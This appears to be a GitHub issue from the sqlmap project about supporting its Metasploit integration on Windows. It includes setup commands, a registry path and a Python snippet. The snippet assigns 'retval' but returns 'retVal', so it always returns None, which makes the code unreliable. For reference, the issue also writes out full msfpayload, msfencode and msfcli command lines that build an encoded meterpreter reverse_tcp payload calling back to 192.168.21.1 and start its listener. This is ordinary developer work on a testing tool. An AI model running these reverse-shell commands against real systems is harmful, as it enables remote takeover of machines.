Open bdamele opened 12 years ago
Sample run: C:\metasploit>scripts\setenv.bat C:\metasploit\msf3>ruby msfpayload
Sample generic one-liner run:
<metasploit_install_dir>\scripts\setenv.bat & ruby <metasploit_install_dir>\msf3\msfpayload
Installation directory registry location:
"HKEY_LOCAL_MACHINE"\"SOFTWARE\Rapid7\Metasploit"\"Location"
import subprocess
IS_WIN = subprocess.mswindows
def _(key, value):
retVal = None
if IS_WIN:
try:
from _winreg import ConnectRegistry, OpenKey, QueryValueEx, HKEY_LOCAL_MACHINE
_ = ConnectRegistry(None, HKEY_LOCAL_MACHINE)
_ = OpenKey(_, key)
retval = QueryValueEx(_, value)[0]
except: # Pokemon Exception Handling
pass
return retVal
installDir = _(r"SOFTWARE\Rapid7\Metasploit", "Location")
Just for further reference for commands/forms which need to be supported:
/usr/local/bin/msfpayload windows/meterpreter/reverse_tcp EXITFUNC=process LPORT=48426 LHOST=192.168.21.1 R | /usr/local/bin/msfencode -a x86 -e x86/alpha_mixed -o /home/stamparm/Dropbox/Work/sqlmap/output/192.168.21.129/tmpmcaro -t raw BufferRegister=EAX
/usr/local/bin/msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=process LPORT=48426 LHOST=192.168.21.1 E
Consider to rewrite the Metasploit integration by interacting with the Metasploit RPC interface (msfrpcd) instead of wrapping the msfconsole/msfpayload/msfencode executables
Now that Metasploit properly runs on Windows too (without cygwin), we definitely need to support all functionalities on Windows too, if possible. Hence, --os-pwn/--os-smbrelay/--os-smb code need to be reviewed: metasploit.py, subprocessng.py and icmpsh*.py.